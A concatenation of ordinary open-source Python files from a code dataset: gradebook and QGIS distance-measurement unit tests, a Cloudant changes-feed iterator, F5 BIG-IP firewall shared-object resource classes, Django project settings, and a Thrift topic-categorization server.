approve_grades=False,
)
# And finally with a bad grade
spreadsheet = [
{'External email': '[email protected]', 'Homework 1': 'foo'},
{'External email': '[email protected]', 'midterm1': 1.1},
]
gradebook._spreadsheet2gradebook_multi(
csv_reader=spreadsheet,
email_field='External email',
non_assignment_fields=['External email'],
approve_grades=False
)
last_request = httpretty.last_request()
self.assertEqual(
last_request.body,
json.dumps([
{u'assignmentId': 2,
u'isGradeApproved': False,
u'mode': 2,
u'numericGradeValue': 1.1,
u'studentId': 1},
])
)
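    # Sketch of the flow exercised above (an explanatory note added here, not
    # original code): a spreadsheet row such as
    #     {'External email': '[email protected]', 'Homework 1': 2.2}
    # is resolved to a studentId via get_student_by_email, 'Homework 1' to an
    # assignmentId via get_assignment_by_name (creating the assignment when it
    # does not exist yet), and the resulting grade dictionaries are posted in
    # a single multiGrades request.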
@mock.patch.object(GradeBook, '_spreadsheet2gradebook_multi')
@mock.patch('csv.DictReader')
    def test_spreadsheet2gradebook(self, csv_patch, multi_patch):
"""Do a simple test of the spreadsheet to gradebook public method"""
non_assignment_fields = [
'ID', 'Username', 'Full Name', 'edX email', 'External email'
]
email_field = 'External email'
gradebook = GradeBook(self.CERT, self.URLBASE)
# Test with tmp file handle
with tempfile.NamedTemporaryFile(delete=True) as temp_file:
gradebook.spreadsheet2gradebook(temp_file.name)
called_with = multi_patch.call_args
csv_patch.assert_called_once()
self.assertEqual(called_with[0][1], email_field)
self.assertEqual(called_with[0][2], non_assignment_fields)
# Test with tmp file handle, approve_grades=False
with tempfile.NamedTemporaryFile(delete=True) as temp_file:
gradebook.spreadsheet2gradebook(temp_file.name,
approve_grades=False)
called_with = multi_patch.call_args
csv_patch.assert_called_once()
self.assertEqual(called_with[0][1], email_field)
self.assertEqual(called_with[0][2], non_assignment_fields)
# Test with tmp file handle, approve_grades=True
with tempfile.NamedTemporaryFile(delete=True) as temp_file:
gradebook.spreadsheet2gradebook(temp_file.name,
approve_grades=True)
called_with = multi_patch.call_args
csv_patch.assert_called_once()
self.assertEqual(called_with[0][1], email_field)
self.assertEqual(called_with[0][2], non_assignment_fields)
# Test with patched csvReader and named e-mail field
alternate_email_field = 'stuff'
gradebook.spreadsheet2gradebook(csv_patch, alternate_email_field)
non_assignment_fields.append(alternate_email_field)
called_with = multi_patch.call_args
csv_patch.assert_called_once()
self.assertEqual(called_with[0][1], alternate_email_field)
self.assertEqual(called_with[0][2], non_assignment_fields)
| bsd-2-clause | -3,731,292,784,134,643,000 | 33.721831 | 78 | 0.54893 | false |
SebDieBln/QGIS | tests/src/python/test_qgsdistancearea.py | 1 | 14468 | # -*- coding: utf-8 -*-
"""QGIS Unit tests for QgsDistanceArea.
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'Jürgen E. Fischer'
__date__ = '19/01/2014'
__copyright__ = 'Copyright 2014, The QGIS Project'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import qgis
from qgis.core import (QgsGeometry,
QgsPoint,
QgsDistanceArea,
QgsCoordinateReferenceSystem,
QGis,
QgsUnitTypes
)
from qgis.testing import (start_app,
unittest)
from PyQt4.QtCore import QLocale
# Convenience instances in case you may need them
# not used in this test
start_app()
class TestQgsDistanceArea(unittest.TestCase):
def testCrs(self):
# test setting/getting the source CRS
da = QgsDistanceArea()
# try setting using a crs id
da.setSourceCrs(3452)
self.assertEqual(da.sourceCrsId(), 3452)
# try setting using a CRS object
crs = QgsCoordinateReferenceSystem(3111, QgsCoordinateReferenceSystem.EpsgCrsId)
da.setSourceCrs(crs)
self.assertEqual(da.sourceCrsId(), crs.srsid())
def testMeasureLine(self):
# +-+
# | |
# +-+ +
linestring = QgsGeometry.fromPolyline(
[QgsPoint(0, 0), QgsPoint(1, 0), QgsPoint(1, 1), QgsPoint(2, 1), QgsPoint(2, 0), ]
)
da = QgsDistanceArea()
length = da.measure(linestring)
myMessage = ('Expected:\n%f\nGot:\n%f\n' %
(4, length))
assert length == 4, myMessage
def testMeasureMultiLine(self):
# +-+ +-+-+
# | | | |
# +-+ + + +-+
linestring = QgsGeometry.fromMultiPolyline(
[
[QgsPoint(0, 0), QgsPoint(1, 0), QgsPoint(1, 1), QgsPoint(2, 1), QgsPoint(2, 0), ],
[QgsPoint(3, 0), QgsPoint(3, 1), QgsPoint(5, 1), QgsPoint(5, 0), QgsPoint(6, 0), ]
]
)
da = QgsDistanceArea()
length = da.measure(linestring)
myMessage = ('Expected:\n%f\nGot:\n%f\n' %
(9, length))
assert length == 9, myMessage
def testMeasurePolygon(self):
# +-+-+
# | |
# + +-+
# | |
# +-+
polygon = QgsGeometry.fromPolygon(
[[
QgsPoint(0, 0), QgsPoint(1, 0), QgsPoint(1, 1), QgsPoint(2, 1), QgsPoint(2, 2), QgsPoint(0, 2), QgsPoint(0, 0),
]]
)
da = QgsDistanceArea()
area = da.measure(polygon)
assert area == 3, 'Expected:\n%f\nGot:\n%f\n' % (3, area)
perimeter = da.measurePerimeter(polygon)
assert perimeter == 8, 'Expected:\n%f\nGot:\n%f\n' % (8, perimeter)
def testMeasurePolygonWithHole(self):
# +-+-+-+
# | |
# + +-+ +
# | | | |
# + +-+ +
# | |
# +-+-+-+
polygon = QgsGeometry.fromPolygon(
[
[QgsPoint(0, 0), QgsPoint(3, 0), QgsPoint(3, 3), QgsPoint(0, 3), QgsPoint(0, 0)],
[QgsPoint(1, 1), QgsPoint(2, 1), QgsPoint(2, 2), QgsPoint(1, 2), QgsPoint(1, 1)],
]
)
da = QgsDistanceArea()
area = da.measure(polygon)
assert area == 8, "Expected:\n%f\nGot:\n%f\n" % (8, area)
# MH150729: Changed behaviour to consider inner rings for perimeter calculation. Therefore, expected result is 16.
perimeter = da.measurePerimeter(polygon)
assert perimeter == 16, "Expected:\n%f\nGot:\n%f\n" % (16, perimeter)
def testMeasureMultiPolygon(self):
# +-+-+ +-+-+
# | | | |
# + +-+ +-+ +
# | | | |
# +-+ +-+
polygon = QgsGeometry.fromMultiPolygon(
[
[[QgsPoint(0, 0), QgsPoint(1, 0), QgsPoint(1, 1), QgsPoint(2, 1), QgsPoint(2, 2), QgsPoint(0, 2), QgsPoint(0, 0), ]],
[[QgsPoint(4, 0), QgsPoint(5, 0), QgsPoint(5, 2), QgsPoint(3, 2), QgsPoint(3, 1), QgsPoint(4, 1), QgsPoint(4, 0), ]]
]
)
da = QgsDistanceArea()
area = da.measure(polygon)
assert area == 6, 'Expected:\n%f\nGot:\n%f\n' % (6, area)
perimeter = da.measurePerimeter(polygon)
assert perimeter == 16, "Expected:\n%f\nGot:\n%f\n" % (16, perimeter)
def testWillUseEllipsoid(self):
"""test QgsDistanceArea::willUseEllipsoid """
da = QgsDistanceArea()
da.setEllipsoidalMode(False)
da.setEllipsoid("NONE")
self.assertFalse(da.willUseEllipsoid())
da.setEllipsoidalMode(True)
self.assertFalse(da.willUseEllipsoid())
da.setEllipsoid("WGS84")
assert da.willUseEllipsoid()
da.setEllipsoidalMode(False)
self.assertFalse(da.willUseEllipsoid())
def testLengthMeasureAndUnits(self):
"""Test a variety of length measurements in different CRS and ellipsoid modes, to check that the
calculated lengths and units are always consistent
"""
da = QgsDistanceArea()
da.setSourceCrs(3452)
da.setEllipsoidalMode(False)
da.setEllipsoid("NONE")
daCRS = QgsCoordinateReferenceSystem()
daCRS.createFromSrsId(da.sourceCrs())
# We check both the measured length AND the units, in case the logic regarding
# ellipsoids and units changes in future
distance = da.measureLine(QgsPoint(1, 1), QgsPoint(2, 3))
units = da.lengthUnits()
print "measured {} in {}".format(distance, QgsUnitTypes.toString(units))
assert ((abs(distance - 2.23606797) < 0.00000001 and units == QGis.Degrees) or
(abs(distance - 248.52) < 0.01 and units == QGis.Meters))
da.setEllipsoid("WGS84")
distance = da.measureLine(QgsPoint(1, 1), QgsPoint(2, 3))
units = da.lengthUnits()
print "measured {} in {}".format(distance, QgsUnitTypes.toString(units))
assert ((abs(distance - 2.23606797) < 0.00000001 and units == QGis.Degrees) or
(abs(distance - 248.52) < 0.01 and units == QGis.Meters))
da.setEllipsoidalMode(True)
distance = da.measureLine(QgsPoint(1, 1), QgsPoint(2, 3))
units = da.lengthUnits()
print "measured {} in {}".format(distance, QgsUnitTypes.toString(units))
# should always be in Meters
self.assertAlmostEqual(distance, 247555.57, delta=0.01)
self.assertEqual(units, QGis.Meters)
# test converting the resultant length
distance = da.convertLengthMeasurement(distance, QGis.NauticalMiles)
self.assertAlmostEqual(distance, 133.669, delta=0.01)
# now try with a source CRS which is in feet
da.setSourceCrs(27469)
da.setEllipsoidalMode(False)
# measurement should be in feet
distance = da.measureLine(QgsPoint(1, 1), QgsPoint(2, 3))
units = da.lengthUnits()
print "measured {} in {}".format(distance, QgsUnitTypes.toString(units))
self.assertAlmostEqual(distance, 2.23606797, delta=0.000001)
self.assertEqual(units, QGis.Feet)
# test converting the resultant length
distance = da.convertLengthMeasurement(distance, QGis.Meters)
self.assertAlmostEqual(distance, 0.6815, delta=0.001)
da.setEllipsoidalMode(True)
# now should be in Meters again
distance = da.measureLine(QgsPoint(1, 1), QgsPoint(2, 3))
units = da.lengthUnits()
print "measured {} in {}".format(distance, QgsUnitTypes.toString(units))
self.assertAlmostEqual(distance, 0.67953772, delta=0.000001)
self.assertEqual(units, QGis.Meters)
# test converting the resultant length
distance = da.convertLengthMeasurement(distance, QGis.Feet)
self.assertAlmostEqual(distance, 2.2294, delta=0.001)
def testAreaMeasureAndUnits(self):
"""Test a variety of area measurements in different CRS and ellipsoid modes, to check that the
calculated areas and units are always consistent
"""
da = QgsDistanceArea()
da.setSourceCrs(3452)
da.setEllipsoidalMode(False)
da.setEllipsoid("NONE")
daCRS = QgsCoordinateReferenceSystem()
daCRS.createFromSrsId(da.sourceCrs())
polygon = QgsGeometry.fromPolygon(
[[
QgsPoint(0, 0), QgsPoint(1, 0), QgsPoint(1, 1), QgsPoint(2, 1), QgsPoint(2, 2), QgsPoint(0, 2), QgsPoint(0, 0),
]]
)
# We check both the measured area AND the units, in case the logic regarding
# ellipsoids and units changes in future
area = da.measureArea(polygon)
units = da.areaUnits()
print "measured {} in {}".format(area, QgsUnitTypes.toString(units))
assert ((abs(area - 3.0) < 0.00000001 and units == QgsUnitTypes.SquareDegrees) or
(abs(area - 37176087091.5) < 0.1 and units == QgsUnitTypes.SquareMeters))
da.setEllipsoid("WGS84")
area = da.measureArea(polygon)
units = da.areaUnits()
print "measured {} in {}".format(area, QgsUnitTypes.toString(units))
assert ((abs(area - 3.0) < 0.00000001 and units == QgsUnitTypes.SquareDegrees) or
(abs(area - 37176087091.5) < 0.1 and units == QgsUnitTypes.SquareMeters))
da.setEllipsoidalMode(True)
area = da.measureArea(polygon)
units = da.areaUnits()
print "measured {} in {}".format(area, QgsUnitTypes.toString(units))
# should always be in Meters Squared
self.assertAlmostEqual(area, 37416879192.9, delta=0.1)
self.assertEqual(units, QgsUnitTypes.SquareMeters)
# test converting the resultant area
area = da.convertAreaMeasurement(area, QgsUnitTypes.SquareMiles)
self.assertAlmostEqual(area, 14446.7378, delta=0.001)
# now try with a source CRS which is in feet
polygon = QgsGeometry.fromPolygon(
[[
QgsPoint(1850000, 4423000), QgsPoint(1851000, 4423000), QgsPoint(1851000, 4424000), QgsPoint(1852000, 4424000), QgsPoint(1852000, 4425000), QgsPoint(1851000, 4425000), QgsPoint(1850000, 4423000)
]]
)
da.setSourceCrs(27469)
da.setEllipsoidalMode(False)
# measurement should be in square feet
area = da.measureArea(polygon)
units = da.areaUnits()
print "measured {} in {}".format(area, QgsUnitTypes.toString(units))
self.assertAlmostEqual(area, 2000000, delta=0.001)
self.assertEqual(units, QgsUnitTypes.SquareFeet)
# test converting the resultant area
area = da.convertAreaMeasurement(area, QgsUnitTypes.SquareYards)
self.assertAlmostEqual(area, 222222.2222, delta=0.001)
da.setEllipsoidalMode(True)
# now should be in Square Meters again
area = da.measureArea(polygon)
units = da.areaUnits()
print "measured {} in {}".format(area, QgsUnitTypes.toString(units))
self.assertAlmostEqual(area, 184149.37, delta=1.0)
self.assertEqual(units, QgsUnitTypes.SquareMeters)
# test converting the resultant area
area = da.convertAreaMeasurement(area, QgsUnitTypes.SquareYards)
self.assertAlmostEqual(area, 220240.8172549, delta=1.0)
def testFormatDistance(self):
"""Test formatting distances"""
QLocale.setDefault(QLocale.c())
self.assertEqual(QgsDistanceArea.formatDistance(45, 3, QGis.Meters), u'45.000 m')
self.assertEqual(QgsDistanceArea.formatDistance(1300, 1, QGis.Meters, False), u'1.3 km')
self.assertEqual(QgsDistanceArea.formatDistance(.005, 1, QGis.Meters, False), u'5.0 mm')
self.assertEqual(QgsDistanceArea.formatDistance(.05, 1, QGis.Meters, False), u'5.0 cm')
self.assertEqual(QgsDistanceArea.formatDistance(1.5, 3, QGis.Kilometers, True), u'1.500 km')
self.assertEqual(QgsDistanceArea.formatDistance(1.5, 3, QGis.Kilometers, False), u'1.500 km')
self.assertEqual(QgsDistanceArea.formatDistance(0.5, 3, QGis.Kilometers, True), u'0.500 km')
self.assertEqual(QgsDistanceArea.formatDistance(0.5, 3, QGis.Kilometers, False), u'500.000 m')
self.assertEqual(QgsDistanceArea.formatDistance(6000, 0, QGis.Feet, True), u'6,000 ft')
self.assertEqual(QgsDistanceArea.formatDistance(6000, 3, QGis.Feet, False), u'1.136 mi')
self.assertEqual(QgsDistanceArea.formatDistance(300, 0, QGis.Feet, True), u'300 ft')
self.assertEqual(QgsDistanceArea.formatDistance(300, 0, QGis.Feet, False), u'300 ft')
self.assertEqual(QgsDistanceArea.formatDistance(3000, 0, QGis.Yards, True), u'3,000 yd')
self.assertEqual(QgsDistanceArea.formatDistance(3000, 3, QGis.Yards, False), u'1.705 mi')
self.assertEqual(QgsDistanceArea.formatDistance(300, 0, QGis.Yards, True), u'300 yd')
self.assertEqual(QgsDistanceArea.formatDistance(300, 0, QGis.Yards, False), u'300 yd')
self.assertEqual(QgsDistanceArea.formatDistance(1.5, 3, QGis.Miles, True), u'1.500 mi')
self.assertEqual(QgsDistanceArea.formatDistance(1.5, 3, QGis.Miles, False), u'1.500 mi')
self.assertEqual(QgsDistanceArea.formatDistance(0.5, 3, QGis.Miles, True), u'0.500 mi')
self.assertEqual(QgsDistanceArea.formatDistance(0.5, 0, QGis.Miles, False), u'2,640 ft')
self.assertEqual(QgsDistanceArea.formatDistance(0.5, 1, QGis.NauticalMiles, True), u'0.5 NM')
self.assertEqual(QgsDistanceArea.formatDistance(0.5, 1, QGis.NauticalMiles, False), u'0.5 NM')
self.assertEqual(QgsDistanceArea.formatDistance(1.5, 1, QGis.NauticalMiles, True), u'1.5 NM')
self.assertEqual(QgsDistanceArea.formatDistance(1.5, 1, QGis.NauticalMiles, False), u'1.5 NM')
self.assertEqual(QgsDistanceArea.formatDistance(1.5, 1, QGis.Degrees, True), u'1.5 degrees')
self.assertEqual(QgsDistanceArea.formatDistance(1.0, 1, QGis.Degrees, False), u'1.0 degree')
self.assertEqual(QgsDistanceArea.formatDistance(1.0, 1, QGis.UnknownUnit, False), u'1.0')
QLocale.setDefault(QLocale.system())
if __name__ == '__main__':
unittest.main()
| gpl-2.0 | -5,419,994,848,910,859,000 | 41.801775 | 210 | 0.617267 | false |
evansde77/metson | src/cloudant/changes.py | 1 | 2389 | #!/usr/bin/env python
"""
_feeds_
Iterator support for consuming changes-like feeds
"""
import json
class Feed(object):
"""
_Feed_
Acts as an infinite iterator for consuming database feeds such as
_changes, suitable for feeding a daemon.
:params:
"""
def __init__(self, session, url, include_docs=False, **kwargs):
self._session = session
self._url = url
self._resp = None
self._line_iter = None
self._last_seq = kwargs.get('since')
self._continuous = kwargs.get('continuous', False)
self._end_of_iteration = False
self._params = {'feed': 'continuous'}
if include_docs:
self._params['include_docs'] = 'true'
def start(self):
"""
_start_
Using the provided session, start streaming
the feed continuously,
if a last seq value is present, pass that along.
"""
params = self._params
if self._last_seq is not None:
params['since'] = self._last_seq
self._resp = self._session.get(self._url, params=params, stream=True)
self._resp.raise_for_status()
self._line_iter = self._resp.iter_lines()
def __iter__(self):
"""
make this object an iterator
"""
return self
def __next__(self):
"""python3 compat"""
return self.next()
def next(self):
"""
_next_
Iterate: pull next line out of the stream,
attempt to convert the response to JSON, handling
case of empty lines.
If end of feed is seen, restart iterator
Returns JSON data representing what was seen in the feed.
"""
if self._end_of_iteration:
raise StopIteration
if not self._resp:
self.start()
line = self._line_iter.next()
if len(line.strip()) == 0:
return {}
try:
data = json.loads(line)
except ValueError:
data = {"error": "Bad JSON line", "line": line}
if data.get('last_seq'):
if self._continuous:
# forever mode => restart
self._last_seq = data['last_seq']
self.start()
return {}
else:
# not forever mode => break
return data
return data
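# Illustrative usage sketch (not part of the original module). It assumes a
# requests-style ``session`` whose ``get(url, params=..., stream=True)`` returns
# a streaming response; the database URL and helper names below are placeholders.
#
#   feed = Feed(session, 'https://example.cloudant.com/mydb/_changes',
#               include_docs=True, since='0', continuous=True)
#   for change in feed:
#       if not change:
#           continue           # empty keep-alive line from the feed
#       handle_change(change)  # hypothetical callback consuming one change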
| apache-2.0 | -1,144,968,541,716,865,700 | 24.688172 | 77 | 0.529929 | false |
F5Networks/f5-common-python | f5/bigip/tm/security/shared_objects.py | 1 | 3549 | # coding=utf-8
#
# Copyright 2015-2017 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""BIG-IP® Advanced Firewall Manager™ (AFM®) module.
REST URI
``http://localhost/mgmt/tm/security/shared-objects``
GUI Path
``Security --> Network Address Translation``
REST Kind
``tm:security:shared-objects:*``
"""
from distutils.version import LooseVersion
from f5.bigip.resource import Collection
from f5.bigip.resource import OrganizingCollection
from f5.bigip.resource import Resource
class Shared_Objects(OrganizingCollection):
"""BIG-IP® AFM® Nat organizing collection."""
def __init__(self, security):
super(Shared_Objects, self).__init__(security)
self._meta_data['minimum_version'] = '14.0.0'
self._meta_data['allowed_lazy_attributes'] = [
Address_Lists,
Port_Lists]
class Address_Lists(Collection):
"""BIG-IP® AFM® Address List collection"""
def __init__(self, shared_objects):
super(Address_Lists, self).__init__(shared_objects)
self._meta_data['allowed_lazy_attributes'] = [Address_List]
self._meta_data['attribute_registry'] = \
{'tm:security:shared-objects:address-list:address-liststate':
Address_List}
class Address_List(Resource):
"""BIG-IP® Address List resource"""
def __init__(self, address_lists):
super(Address_List, self).__init__(address_lists)
self._meta_data['required_json_kind'] = \
'tm:security:shared-objects:address-list:address-liststate'
self._meta_data['required_creation_parameters'].update(('partition',))
self._meta_data['required_load_parameters'].update(('partition',))
self.tmos_ver = self._meta_data['bigip'].tmos_version
if LooseVersion(self.tmos_ver) < LooseVersion('12.0.0'):
self._meta_data['minimum_additional_parameters'] = {
'addressLists', 'addresses', 'geo'}
else:
self._meta_data['minimum_additional_parameters'] = {
'addressLists', 'addresses', 'geo', 'fqdns'}
class Port_Lists(Collection):
"""BIG-IP® AFM® Port List collection"""
def __init__(self, shared_objects):
super(Port_Lists, self).__init__(shared_objects)
self._meta_data['allowed_lazy_attributes'] = [Port_List]
self._meta_data['attribute_registry'] = \
{'tm:security:shared-objects:port-list:port-liststate':
Port_List}
class Port_List(Resource):
"""BIG-IP® Port List resource"""
def __init__(self, port_lists):
super(Port_List, self).__init__(port_lists)
self._meta_data['required_json_kind'] = \
'tm:security:shared-objects:port-list:port-liststate'
self._meta_data['required_creation_parameters'].update(('partition',))
self._meta_data['required_load_parameters'].update(('partition',))
self._meta_data['minimum_additional_parameters'] = {'ports',
'portLists'}
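# Illustrative usage sketch (not part of the original module). It assumes the
# usual f5-common-python entry point, ``ManagementRoot`` from ``f5.bigip``;
# the host, credentials and object names below are placeholders.
#
#   from f5.bigip import ManagementRoot
#   mgmt = ManagementRoot('bigip.example.com', 'admin', 'secret')
#   addr_list = mgmt.tm.security.shared_objects.address_lists.address_list.create(
#       name='my_addr_list', partition='Common',
#       addresses=[{'name': '10.0.0.1'}])
#   port_list = mgmt.tm.security.shared_objects.port_lists.port_list.load(
#       name='my_port_list', partition='Common')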
| apache-2.0 | -1,649,058,166,927,586,600 | 37.445652 | 78 | 0.642352 | false |
knightofni/django-template | config/settings/common.py | 1 | 8207 | # -*- coding: utf-8 -*-
"""
Django settings for id_website project.
For more information on this file, see
https://docs.djangoproject.com/en/dev/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/dev/ref/settings/
"""
from __future__ import absolute_import, unicode_literals
import environ
ROOT_DIR = environ.Path(__file__) - 3 # (/a/b/myfile.py - 3 = /)
APPS_DIR = ROOT_DIR.path('id_website')
env = environ.Env()
# APP CONFIGURATION
# ------------------------------------------------------------------------------
DJANGO_APPS = (
# Default Django apps:
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Useful template tags:
# 'django.contrib.humanize',
'material',
'material.frontend',
'material.admin',
# Admin
'django.contrib.admin',
)
THIRD_PARTY_APPS = (
'crispy_forms', # Form layouts
'allauth', # registration
'allauth.account', # registration
'allauth.socialaccount', # registration
)
# Apps specific for this project go here.
LOCAL_APPS = (
'id_website.users', # custom users app
# Your stuff: custom apps go here
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS
# MIDDLEWARE CONFIGURATION
# ------------------------------------------------------------------------------
MIDDLEWARE_CLASSES = (
# Make sure djangosecure.middleware.SecurityMiddleware is listed first
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
# MIGRATIONS CONFIGURATION
# ------------------------------------------------------------------------------
MIGRATION_MODULES = {
'sites': 'id_website.contrib.sites.migrations'
}
# DEBUG
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = env.bool("DJANGO_DEBUG", False)
# FIXTURE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS
FIXTURE_DIRS = (
str(APPS_DIR.path('fixtures')),
)
# EMAIL CONFIGURATION
# ------------------------------------------------------------------------------
EMAIL_BACKEND = env('DJANGO_EMAIL_BACKEND', default='django.core.mail.backends.smtp.EmailBackend')
# MANAGER CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = (
("""Nicolas Paris""", '[email protected]'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
# DATABASE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
# DATABASES = {
# # Raises ImproperlyConfigured exception if DATABASE_URL not in os.environ
# 'default': env.db("DATABASE_URL", default="postgres:///id_website"),
# }
# GENERAL CONFIGURATION
# ------------------------------------------------------------------------------
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'Asia/Singapore'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = 'en-us'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
# TEMPLATE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#templates
TEMPLATES = [
{
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-TEMPLATES-BACKEND
'BACKEND': 'django.template.backends.django.DjangoTemplates',
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
'DIRS': [
str(APPS_DIR.path('templates')),
],
'OPTIONS': {
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
'debug': DEBUG,
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-loaders
# https://docs.djangoproject.com/en/dev/ref/templates/api/#loader-types
'loaders': [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
],
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
# Your stuff: custom template context processors go here
],
},
},
]
# See: http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs
CRISPY_TEMPLATE_PACK = 'bootstrap3'
# STATIC FILE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = str(ROOT_DIR('staticfiles'))
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = (
str(APPS_DIR.path('static')),
)
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
# MEDIA CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = str(APPS_DIR('media'))
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
# URL Configuration
# ------------------------------------------------------------------------------
ROOT_URLCONF = 'config.urls'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = 'config.wsgi.application'
# AUTHENTICATION CONFIGURATION
# ------------------------------------------------------------------------------
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend',
)
# Some really nice defaults
ACCOUNT_AUTHENTICATION_METHOD = 'username'
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_EMAIL_VERIFICATION = 'mandatory'
# Custom user app defaults
# Select the correct user model
AUTH_USER_MODEL = 'users.User'
LOGIN_REDIRECT_URL = 'users:redirect'
LOGIN_URL = 'account_login'
# SLUGLIFIER
AUTOSLUG_SLUGIFY_FUNCTION = 'slugify.slugify'
# Location of root django.contrib.admin URL, use {% url 'admin:index' %}
ADMIN_URL = r'^admin/'
# Your common stuff: Below this line define 3rd party library settings
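# Illustrative sketch of how an environment-specific module would typically
# extend these settings (a hypothetical config/settings/local.py, not part of
# this project):
#
#   from .common import *  # noqa
#   DEBUG = True
#   EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
#   DATABASES = {'default': env.db('DATABASE_URL',
#                                  default='postgres:///id_website')}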
| mit | 79,249,630,948,145,120 | 34.682609 | 98 | 0.604971 | false |
serendio-labs-stage/diskoveror-ml-server | TopicThrift/server.py | 1 | 1840 | '''
Copyright 2015 Serendio Inc.
Author - Satish Palaniappan
Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and limitations under the License.
'''
__author__ = "Satish Palaniappan"
### Insert Current Path
import os, sys, inspect
cmd_folder = os.path.realpath(os.path.abspath(os.path.split(inspect.getfile(inspect.currentframe()))[0]))
if cmd_folder not in sys.path:
sys.path.insert(0, cmd_folder)
sys.path.append(cmd_folder + '/gen-py')
from categorizer import Categorizer
from categorizer.ttypes import *
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from thrift.server import TServer
import socket
sys.path.append(cmd_folder + "/Model/")
import Categorize
class CategorizerHandler:
def __init__(self):
self.log = {}
self.catz = Categorize.Categorize()
def ping(self):
print ("Ping Success !! :)")
return
def getTopic(self, text):
cat = self.catz.getCategory(text)
print ("The Text : " + text + " ||| Topic: " + cat)
return cat
handler = CategorizerHandler()
processor = Categorizer.Processor(handler)
transport = TSocket.TServerSocket(port=8001)
tfactory = TTransport.TBufferedTransportFactory()
pfactory = TBinaryProtocol.TBinaryProtocolFactory()
server = TServer.TSimpleServer(processor, transport, tfactory, pfactory)
print ("Python topics server running...")
server.serve()
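# Illustrative client-side sketch (not part of this script), using the same
# generated Categorizer stubs; host and port are assumptions matching the
# TSocket configured above.
#
#   transport = TTransport.TBufferedTransport(TSocket.TSocket('localhost', 8001))
#   protocol = TBinaryProtocol.TBinaryProtocol(transport)
#   client = Categorizer.Client(protocol)
#   transport.open()
#   client.ping()
#   print(client.getTopic("The central bank raised interest rates again"))
#   transport.close()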
| apache-2.0 | -1,131,072,699,975,567,200 | 31.280702 | 168 | 0.755978 | false |
